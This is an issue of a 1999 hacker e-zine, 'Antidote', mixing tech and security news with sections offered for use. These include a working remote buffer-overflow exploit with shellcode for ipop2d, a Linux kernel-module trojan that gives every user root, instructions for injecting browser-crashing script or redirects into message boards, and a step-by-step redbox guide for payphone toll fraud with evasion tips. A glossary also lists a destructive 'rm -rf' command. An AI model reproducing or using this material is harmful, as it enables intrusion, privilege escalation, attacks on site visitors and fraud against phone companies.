Volume 2 Issue 10 6/28/99 ** ** ***** * * ** * * *** ** *** ** ** *** ** * ** ** * ** ******** ** **** ******** * ** *** **** ******** *** *** ** * *** * ******** *** * ** **** **** * ** *** ********* * **** ** * *** * ** ** **** ** ** ** **** ** ** ** * *** * ** ** ** ** ** ** ** ** ** ** ** *** ********* ** ** ** ** ** ** ** ** ** ******** * ** ** ** ** ** ** ** ** ** ** ******* * ** ** ** ** ** ** ** ** ** ** ** ***** ** ** ** ** ** ** ** ****** ** **** * * **** ** * *** *** ** *** * ***** **** ** ******* * ** ** *** *** *** *** ***** * ** http://www.thepoison.org/antidote bof_ptr = (long *)buffer; for (i = 0; i < bufsize - 4; i += 4) *(bof_ptr++) = get_sp() - offs; printf ("Creating termcap f1le\n"); printf ("b1tch is Fe3lyn 1t.\n"; ------------------------------ In this issue of Antidote, we have over 690 subscribers and getting more everyday! The only thing that we ask of you when you read Antidote, is that you go to: www.thepoison.org/popup.html and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you. --=\\Contents\\=-- 0.0 - Beginning 0.01 - What? 0.02 - FAQ 0.03 - Authors 0.04 - Shouts 0.05 - Writing 1.00 - News 1.01 - Rio RedBox 1.02 - MicroScared goes Ape Shit for Privacy 1.03 - Crypto bill Passed 1.04 - Hacked site Alleges Media Conspiracy 1.05 - Congress Warned of Hacker Threats 1.06 - GSA launches intrusion-detection net 2.00 - Exploits (new & older) 2.01 - subipop2d.c.txt 2.02 - wwwboard.bof.txt 2.03 - all-root.c.txt 3.00 - Misc 3.01 - Neophyte Vocab SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just plane making fun of something or someone. FEAT.S - FEATURED SITES: www.thepoison.org/hosting www.403-security.org www.hackernews.com ------------------------------ ************************************************** ________________________________________________ | ___ ___ __ __ | | | | |.-----.-----.| |_|__|.-----.-----. | | | || _ |__ --|| _| || | _ | | | |___|___||_____|_____||____|__||__|__|___ | | | http://www.thepoison.org/hosting |_____| | | | | Low affordable pricing starting at $10! | |________________________________________________| ************************************************** 0.01 --=\\What?\\=-- What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on there hands and are bored with nothing to do. If you want to read a maga- zine that teaches you how to hack etc, then you might want to go to your local book- store and see if they carry '2600'. ------------------------------ 0.02 --=\\FAQ\\=-- Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question. > What exactly is "Antidote"? See section 0.01 for a complete description. > I find Antidote to not be shot for the beginner or does not teach you the basics, why is that? Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are recieved second hand (sent to us) and we very rarely edit anyone's articles. > I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail? Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will recieve a link to the current Antidote (where you can view it). > If I want to submit something, are there any 'rules'? Please see section 0.03 for a complete description. > If I submitted something, can I remain anonymous? Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say. > I submitted something and I didn't see it in the current/last issue, why is that? It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e- mails no matter what). We might use your article in future issues off Antidote. > Can I submit something that I didn't "discover" or "write"? Yes you can, we take information that is written by anyone regardless if you wrote it or not. Well thats it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month. ------------------------------ 0.03 --=\\Authors\\=-- Lord Oak is the founder and current president of Antidote. Most work is done by him. Please feel free to e-mail him at: lordoak@thepoison.org Duece is the co-founder and co-president of Antidote, some work is done by him when he comes online. Feel free to e-mail him at: duece@thepoison.org ox1dation not really an author, just someone that helps us out a lot and we consider him as an author! His e-mail address is: ox1dation@thepoison.org ------------------------------ 0.04 --=\\Shouts\\=-- These are just some shout outs that we feel we owe to some people. Some are individuals and Some are groups in general. If you are not on this list and you feel that For some reason you should be, then please contact Lord Oak and he will post you on here and we are sorry for the Misunderstanding. Well, here are the shout outs: Lord Oak EazyMoney Duece opt1mus oX1dation PBBSER Forlorn Retribution 0dnek www.thepoison.org Like we said above, if we forgot you and/or you think you should be added, please e- mail lordoak@thepoison.org and he will be sure to add you. ------------------------------ 0.05 --=\\Writing\\=-- As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for: -Protecting the system (security/securing) -Attacking the system (hacking, exploits, flaws, etc....) -UNIX (really anything to do with it...) -News that has to do with any of the above.... The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it). ------------------------------ _________________________________ ) ___ ( ( //___/ / // ) ) // ) ) ) ) /____ / // / / __ / / ( ( / / // / / ) ) ) ) / / ((___/ / ((___/ / ( ( http://www.403-security.org ) ) For the latest hacks and news ( (___________________________________) 1.01 --=\\RIO Redbox\\=-- The construction, possession, and/or operation of this device may be a criminal offence. Don't do it. This information is presented because it is common and readily available. This article is based on a Canadian Perspective, with some US info, but the procedures are Canadian. Purpose: If you are one of the MP3 lovers out there that own a Diamond RIO (gotta love these things), you can easily convert them to a nice Redbox for free calls and as a replacement for that damned annoying HOLD MUSIC! How-to: 1. Get a hold of a Diamond RIO PMP300, easy enough if you've got the money. (They ain't cheap, but they are worth it just for the mp3 part.) 2. Get the tones. In Canada you need to generate Canadian N-ACTS tones, and in the US you need to use American ACTS tones. Use a program like Cool Edit (http://www.syntrillium.com) to generate the tones. Here are the tones you need to make: N-ACTS (Canadian): Nickel - 2200hz 0.06s on Dime - 2200hz 0.06s on, 0.06s off, twice repeating Quarter - 2200hz 33ms on, 33ms off, 5 times repeating ACTS (American): Nickel - 1700+2200hz 0.060s on Dime - 1700+2200hz 0.060s on, 0.060s off, twice repeating Quarter - 1700+2200hz 33ms on, 33ms off, 5 times repeating (5 times, as in "on, off, on, off, on, off, on, off, on") 3. Convert the tones to Mp3's. At this time, the most lean and clean program I've found is the FhG Mpeg Layer-3 Producer from Opticom (http://www.opticom.de/) it allows you to encode any Windows PCM wav file. Encode the tones at the highest rate you can, usually 128kBits/s and 44,100Hz Stereo. This limits any distortion that the encoding may cause (anything lower and the tones are useless). They take less than a second to encode on a decent processor. 4. Load the RIO. Use whatever software you use to load your RIO up. Make sure you remember which track was which coin. 5. Outputting the tones. This is pretty much open for you to do yourselves. You just need a speaker with a high enough fidelity and a decent output. A prefab speaker from radio shack can work, or you can modify a PC speaker or something with a Mini-din connector to hook into the RIO. The choice is up to you. I found that a prefab, 2", battery amplified portable speaker works quite well, and doesn't look to conspicuous if you're searched. Just a jumble of wires and speakers McGyvered together. 6. Using your Rio Redbox. Long distance 1. Dial a long distance number. 2. You will be connected with an electronic or human operator telling you how much money to deposit. Insert $.05, Hold the RIOBox speaker up to the phones mouthpiece and play the required number of tones. Don't be afraid of putting in a few cents worth extra, redboxing doesn't need exact change. 3. When more money is required play more tones into the mouthpiece. Local Calls 1. Dial information or an operator and ask them to place your call for you. If they ask why, come up with a unique excuse. 2. She will ask for money. Insert 5 cents first and then use your RIOBox. This prevents the operator from "seeing" that you are using a RIOBox. This may or may not be necessary. Experiment. International Calls 1. Dial an international phone number. 2. An operator will ask for money. Insert 5 cents first and then use your RIOBox. This prevents the operator from "seeing" that you are using a RIOBox. This may or may not be necessary. Experiment. 3. When more money is required play more tones into the mouthpiece. Notes and suggestions: A suggestion is to insert a second of silence before and after the tone so you have time to hit the stop button so the RIO doesn't blow through all the tones in 2 seconds. This also gives you a chance to randomize the "coins" your inserting, so as not to alert any powers that be. Another would be to pickup a small 2-4 Meg smartmedia card for storing these. That way you can keep the tones hidden, but easily accessible. Plus the card can be destroyed quickly in case of trouble and you'll be left with a nice (legal) RIO. You may also want to mix (with random time between coins) preset amounts, like $2.50 or $3.95 and have them on a separate track for convenience sake, especially if you know before hand how much it's gonna cost. For more info on redboxing in Canada, check out cyb0rg/asm's article @ www.hackcanada.com, much of this article was "borrowed" from his article. Copyright (c) 1999 RenderMan http://www.hackcanada.com ------------------------------ 1.02 --=\\MicroScared goes Ape Shit for Privacy\\=-- [www.techserver.com] Microsoft Corp., the largest advertiser on the Internet, has decided it will not buy ads next year on Web sites that fail to publish adequate privacy promises to consumers. The announcement comes less than three months after a similar decision by IBM, the Web's second-largest advertiser. The actions by the two companies come as the Federal Trade Commission prepares its recommendations to Congress on whether tough new federal privacy laws are needed to protect consumers online. The Microsoft announcement to be made Wednesday was expected at a computer conference in New York and will take effect after the end of the year. Microsoft said it spent about $30 million last year on Web ads - but that's still a small portion of the $2 billion spent last year on Web advertising, according to the Internet Advertising Bur- eau. Microsoft, which has lobbied with other industry groups against privacy laws legisla- tion, earlier this year began offering a free digital tool kit that promises to allow consumers to use next-generation software to restrict what personal details Web sites collect about them. Consumers typically must manually find a company's online privacy statement, if one exists, and read through legalese to determine what personal information a Web site might be harvesting, such as their name, e-mail address or even favorite authors or clothing sizes. Last month, an industry-financed study showed businesses have made dramatic improve- ments since last year in warning people how companies use personal information collec- ted about them. Nearly two-thirds of commercial Internet sites displayed at least some warning that businesses were collecting personal details from visitors, such as names, postal and e- mail addresses, and even shopping tastes, the study found. But less than 10 percent of those sites had what experts consider comprehensive privacy policies. A similar study last summer by the FTC found only 14 percent of sites warned how companies used private information they collected about customers. http://www.techserver.com/story/body/0,1634,62850-99839-710835-0,00.html ------------------------------ 1.03 --=\\Crypto bill Passed\\=-- [www.wired.com] A bill to relax strict US export limits on computer data-scrambling technology moved ahead in the Senate Wednesday, but still faces several hurdles, including White House opposition. The Senate Commerce Committee's approval of S798, the Promote Reliable On-Line Tran- sactions to Encourage Commerce and Trade Act (PROTECT), marked a victory for technology companies. The panel favored a far more restrictive approach two years ago, but revers- ed course after a powerful lobbying campaign by the industry. Scrambling or encryption technology, which is included in everything from cable tele- vision control boxes to email and Web browsing software, has become a critical means of securing global communications and electronic commerce over the Internet. http://www.wired.com/news/news/politics/story/20383.html ------------------------------ 1.04 --=\\Hacked site Alleges Media Conspiracy\\=-- [www.7am.com] Although repaired and back online within just a few short hours, the Thanks-CGI website appears to have been hit a second time by the "Hackers In Paradise" group. This time the group appear happy to have simply changed the scrolling javascript banner at the bottom of the page to read "HiP Welcomes you to THANKS-CGI.... We're trying to make your site more secure for the world!" The operator of the website has told 7am.com that they are currently testing for holes in their CGI scripts. They have suggested that the security hole may not be the fault of their scripts -- rather that it could have been a "misconfiguration between cgi script and the server." 7am.com discovered the hack while researching another story on CGI resources and contacted the site's operator by email immediately the problem was noticed. However, the operator of the Thanks-CGI site has suggested that because "the arrival of your e- mail was paced so closely with the occurence [sic] of the hackage ... we have strong reason to believe there might be a relationship between 7am.com and the hacker who hacked our site." http://7am.com/cgi-bin/twires.cgi?1000_t99062202.htm ------------------------------ 1.05 --=\\Congress warned of hacker threats\\=-- [www.usatoday.com] Government Web sites and computer networks are increasingly vulnerable to "cyber attacks'' because they lack trained personnel and don't follow security plans, federal officials warned a congressional committee Thursday. Few people have adequate training to defend government Web sites, and those who do seldom work in government for long, three panelists told the House Science Committee's subcommittee on technology. The security agencies "train people at government expense and the private sector waves a bigger paycheck and takes them away,'' said Keith Rhodes, technical director with the General Accounting Office. In addition, government security experts often find their advice isn't followed, said Raymond Kammer, director of the National Institutes for Standards and Technology, which recommends security measures for federal computers. "It is imperative that federal agencies implement vigorous security programs,'' Rhodes said. Hacker attacks like the recent defacing of the Senate Web site are well documented, but information about attempts to access sensitive intelligence information is "very sketchy,'' said Michael Jacobs, a deputy director of the National Security Agency. Hackers are often nearly impossible to trace unless they boast of their actions. In the most common type of attack, hackers overwhelm Web sites with a flood of requests for information, causing the site to slow or shut down. Hackers can also redirect visitors to a fake Web site that appears to be the official site, as happened earlier this month to the Senate site. "We are clearly seeing an escalation in both the destructive nature and aggressive pace of these and other attacks,'' Jacobs said. http://www.usatoday.com/life/cyber/tech/ctf465.htm ------------------------------ 1.06 --=\\GSA launches intrusion-detection net\\=-- [www.fcw.com] The General Services Administration last week asked industry for information about emerging security technology for detecting unauthorized users on agency networks, with the goal of building a government intrusion-detection system by the end of next year. In building the Federal Intrusion Detection Network (Fidnet), GSA hopes to find security tools vendors are developing that overcome the weaknesses of existing technology. By keeping ahead of the latest technology, GSA hopes to leave agency defenses less vulner- able to hackers, agency officials said. "We want to encourage people to develop new technologies that will help us keep neck and neck with the perpetrator," said David Jarrell, program manager for the GSA portion of Fidnet in the Federal Technology Service's Office of Information Security and technical director of the Federal Computer Incident Response Capability. OIS will look not only to established intrusion-detection vendors but to new companies and people that "we haven't even heard of," Jarrell said. "I think there are people out there that are significantly brilliant enough to solve this and we hope that this [request for information] will cause them to come forward," he said. GSA plans to use the vendor-provided information to develop prototypes by the first quarter of fiscal 2000, said Tom Burke, GSA's assistant commissioner of information security. Down the line, OIS may even pay some of the vendors to put together a long- term, real-world demonstration of their capabilities at an agency, he said. GSA particularly is interested in finding intrusion-detection systems that are more capable of detecting attacks as they happen instead of after the fact. The problem is that most intrusion-detection solutions work the same way anti-virus protection does: They check network-use patterns against a known list of intrusion "signatures" and send out alerts when they come across a match. But as vendors and users have known for years, this method will not catch intrusions that are not on that list. Also, most products just now are advancing to the point where they alert administrators at the time an intrusion takes place. "We find that many of the off-the-shelf products that are available today are really a response to the intrusions, and they are always a step behind the intruder," Jarrell said. "We want to look to the future and some artificial intelligence that will learn as it goes about the attacks that are being launched." This type of capability would be more than welcome to agencies, especially if they are enabled to respond more quickly at the local level, said one senior civilian agency official. Others recognized the potential benefits of sharing attack "experience" across govern- ment. "What I would hope this next-generation intrusion detection could bring to us is the capability not only to monitor [intrusions] but to put together the information in a history for reference," said Sarah Jane League, Defense Department liaison at the Crit- ical Infrastructure Assurance Office. "It should bring that pattern recognition and learn as it goes...so that over time it will have the ability to recognize" not only attacks but what could be attacks, she said. Vendors have been working on this type of product, sometimes called anomaly detection, for some time. "ISS has a lot of research efforts in place to advance the intrusion-detection market," said Mark Wood, intrusion-detection product manager at Internet Security Systems Inc., maker of the Real-Secure intrusion-detection product line. "Having a pre-defined list of signatures is nice, but you'd like to detect novel attacks, things you don't know about." One major problem vendors are struggling with in producing this type of solution is the large number of "false positives" -- incorrectly perceived attacks -- that are generated when a network is scanned, Wood said. Despite this, a commercially viable solution could be available within the next year, he said. "It's certainly worthwhile that someone like the GSA is driving this; it's absolutely necessary," Wood said. "Perhaps this will help coordinate the industry so that they will provide something sooner than they would have." The need for this type of solution across government has been underscored by the more than 40 federal World Wide Web sites that have been hacked in the last two months, in- cluding at least six last week. And these attacks are only the most noticeable types of intrusions into government networks, according to federal experts testifying before Congress last week [see related story, "House member suggests regular network security reports"]. However, in the end, while many would wish otherwise, keeping up with attackers instead of one step behind really is the best that anyone can do, Jarrell said. "There is no silver bullet; there is no perfect solution when it comes to intrusion detection," he said. "As I've said before, if you build a better mousetrap, a better mouse will evolve." http://www.fcw.com/pubs/fcw/1999/0628/fcw-newsintrusion-6-28-99.html ------------------------------ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #!/usr/bin/perl # Lord Oak's famous Perl script. # # minor configuring is needed! # ################################## # path to the frequently asked questions.... $faq = "/home/username/faq.html"; ##### Do not edit anything else! ##### print "Content-type: text/html\n\n"; open(FAQ,"<$faq"); print FAQ "Question: who runs this place?\n"; print FAQ "
\n"; print FAQ "Answer: Donno, but Lord Oak 0wnz it\n"; close (FAQ); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 2.01 --=\\subipop2d.c.txt\\=-- /* * subipop2d.c (c) 1999 Subterrain Security * * Written by bind - June 18, 1999 * * Vulnerable: ipop2 daemons shipped with the imap-4.4 package * Compromise: remote users can spawn a shell as user "nobody * * Greets: vacuum, xdr & cripto... * * Usage: * ./subipop2 [offset] [alignment] [timeout] * * Try offsets -500...500, alignment option should be between 0 and 3 * */ #include #include #include #define RET 0xbffff718 #define NOP 0x90 #define WAIT 20 char shellcode[] = /* shellcode "borrowed" from plaguez's imapx.c */ "\xeb\x38\x5e\x89\xf3\x89\xd8\x80\x46\x01\x20\x80\x46\x02\x20\x80" "\x46\x03\x20\x80\x46\x05\x20\x80\x46\x06\x20\x89\xf7\x83\xc7\x07" "\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc3\xff\xff\xff\x2f" "\x42\x49\x4e\x2f\x53\x48\x00"; int main (int argc, char **argv) { char buf[1002], *auth, *user, *pass; int i, offset = 0, align = 0, timeout = WAIT; unsigned long addr; if (argc < 4) { printf ("usage: %s [offset] [alignment]" " [timeout]\n", argv[0]); exit (1); } auth = argv[1]; user = argv[2]; pass = argv[3]; if (argc > 4) offset = atoi (argv[4]); if (argc > 5) align = atoi (argv[5]); if (argc > 6) timeout = atoi (argv[6]); addr = RET - offset; memset (buf, NOP, 1002); memcpy (buf + 500, shellcode, strlen (shellcode)); for (i = (strlen (shellcode) + (600 + align)); i <= 1002; i += 4) *(long *) &buf[i] = addr; sleep (2); printf ("HELO %s:%s %s\n", auth, user, pass); sleep (timeout); printf ("FOLD %s\n", buf); } ------------------------------ 2.02 --=\\wwwboard.bof.txt\\=-- As we all know, there are many problems with Matt Wrights wwwboard (www.worldwidemart.com/scripts). Even though there are many errors in it, it is still one of the most commonly used boards today. I have found yet another glitch with his wwwboard. What it will do is kick someone that veiws your message off of Internet Explorer 4.0+. I will take no credit in the JavaScript writing because i did not write it, i just discovered that it could be used with his board. Input this in the message area:
Kicking.............

It is a buffer overflow done in javascript. I found it on a webpage somewhere and i do not remember where so i am very sorry to the person that wrote it that i cannot list your name here cause i found this a while ago. Sometimes this kicker doesn't work. But we know that his board supports HTML so you can input this script that will redirect the person to another page containing the script. Input this into the message area: Redirecting..... The kicker is located at the page so when the user wants to read your post, it will redirect them to that page wich contains that JavaScript code. I would reccomend just putting that refresh tag instead of the JavaScript tag cause the Matt Wright wwwboard comes with JavaScript turned off or as the defualt. So the refresh would work better and would have more of a chance of it to work. This doesn't just work with Matt Wright's wwwboards, but really any wwwboards that support HTML. It is just that i tested and figured out how this worked on a Matt Wright wwwboard. This is also a good trick if you have a sponser that pays by the click, just redirect them to your sponser.... Lord Oak lordoak@thepoison.org ------------------------------ 2.03 --=\\all-root.c.txt\\=-- /* * A kernel trojan (basic linux kernel module) * * Description: gives all users root * * coded by fred_ | blasphemy * * Compile: gcc -c -O3 all-root.c * Load: insmod all-root.o * Unload: rmmod all-root * * email: cornoil@netscape.net */ #define MODULE #define __KERNEL__ #include #include #include #include #include #include #include #include #include #include #include #include #include extern void *sys_call_table[]; int (*orig_getuid)(); int give_root() { int x; if (current->uid != 0) { current->uid = 0; current->gid = 0; current->euid = 0; current->egid = 0; } return 0; } int init_module(void) { orig_getuid = sys_call_table[SYS_getuid]; sys_call_table[SYS_getuid] = give_root; return 0; } void cleanup_module(void) { sys_call_table[SYS_getuid] = orig_getuid; } ------------------------------ 3.01 --=\\Neophyte Vocab\\=-- Here is a list of vocab that I made up for the newbies. You should probably learn this if you are taking into consideration of being a 'computer h4x0r'. This is probably where you should start and the first thing you should learn before anything else. I put them in alphabetical order (finally learned how to do that!) *Words & Descriptions: 31337 - see elite. box - basically the OS or your computer. buffer overflow - tries to 'overflow' some part of a server (see exploit & server). dns - domain name server. Changes xx.xx.xxx.x to yourdomain.com (brief description). dos - denial of service; something to slow a computer down (see nuke & ping). computer - a television set with buttons and a rodent attached to it. elite - the best at something who can make no mistakes at that something. exploit - a security hole (in a server, web browser, anything). ftp - file transfer protocol. Used to transer files (upload and/or download). ftpd - ftp daemon (see ftp server & ftp). ftp server - a server used to allows people to ftp to it (see ftp). http - hypertext tranfser protocol. Allows you to view the persons webpage. httpd - http daemon (see http & http server). http server - a server that allows people to surf/view your site. lamer - someone that tries to understand hacking and doesn't. linux - an operating system that is like a "sub-operating system" of unix (see unix). local exploit - an exploit that only works on 127.0.0.1 or "local host" (see exploit). nuke - sends large packets to a computer causing a dos (see dos). passwd - where all of the usernames and passwords are stored on a unix box (see unix). passwd cracker - program used for cracking passwd files (see passwd & wordlist). ping - sends 'x' number of packets to a computer and sees how fast they get there. port scanner - program used for scanning various ports on a computer (see computer). remote exploit - an exploit that can be used on any IP (see exploit). rm -rf */ - unix command to delete everything on the server (see unix). root - the username to a unix box. The person that has super user privlages. script kiddie - someone that uses other peoples exploits or that weren't made by them. server - where you go when you type in a site URL and upload to a site (basic descrip.) shell account - a user account on a unix box (see unix). unix - the operating system that MOST servers are run on (see server). warez - giving away or re-selling already used copyrighted material. windowsNT - another operating system that a lot of servers run on (see server). wordlist - file w/ generated words, for cracking passwd files (see passwd cracking). *Sayings & Descriptions: I like your computer - means he likes your rodent/rat. I got root - means someone gained root on a server. I got a shell account - means someone got a user account on a unix server/computer. I used the IMAPD exploit - means that he used the IMAPD security glitch to gain access. Ok I hope your starting to understand the 'sayings' and how to understand the vocab when they are put into sentances. *Programs & misc: passwd cracking - John the Ripper, pass crack port scanner - 7th Sphere port scanner, Hackers Utility wordlist generators - Dictionary Generator v1.0 (dic-gen), passlist shell accounts - www.cyberspace.org, www.shellyeah.com, www.freeshells.net All of these programs can be found on my site (www.thepoison.org), and a lot more of them. These are just some of the programs that I use when I am in windows and to lazy to reboot into RH5.2 (RedHat 5.2). Lord Oak lordoak@thepoison.org ------------------------------ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- . Quote #3- . . . . "I needed the DOS prog so I could impress my NY Times slut..." . . -JayPee . . . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _| _| _| _| _| _| _| Antidote is an HNN Affiliate _| _| http://www.hackernews.com _| _| _| _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| *ALL* ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission is needed before using.